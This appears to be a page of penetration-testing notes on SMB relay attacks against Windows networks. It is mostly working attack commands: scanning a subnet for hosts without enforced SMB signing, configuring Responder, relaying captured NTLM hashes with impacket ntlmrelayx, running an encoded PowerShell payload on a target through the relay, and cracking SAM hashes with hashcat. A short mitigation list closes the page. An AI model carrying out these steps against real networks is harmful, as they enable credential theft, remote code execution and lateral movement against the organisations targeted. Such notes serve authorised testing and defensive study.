SMB Relay

Overview

Instead of cracking the captured hashes, we can instead relay those hashes to specific machines and potentially gain access.

However, SMB signing MUST BE DISABLED or NOT ENFORCED on target and the relayed credentials must be local administrator on the machine for any real value

Identify Hosts Without SMB Signing

nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24

Desired Output

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|    3:1:1:
|_     Message signing enabled but not required

Edit Responder Configuration File

sudo vim /etc/responder/Responder.conf

SMB = off
HTTP = off

Responder + SMB Relay

sudo responder -I etho0 -dwv

impacket-ntlmrelayx -tf targets.txt -smb2support

Existing Shell + SMB Relay

ntlmrelayx.py --no-http-server -smb2support -t 192.168.186.212 -c "powershell -e JABPE..."

net use "\\192.168.45.237\share"

Crack SAM Hashes

hashcat -m 1000 crackme.txt ~/rockyou.txt -O

Mitigation

Enable SMB Signing on all devices
- Pro: Completely stops the attacks
- Con: Performance issues may arise with file copies
Disable NTLM authentication on the Network
- Pros: Completely stops the attack
- Con: If Kerberos stops working, Windows defaults back to NTLM
Limit Domain Admins for specific tasks
Local Administrator restrictions

PreviousLLMNR Poisoning NextShell Acess

Last updated 11 months ago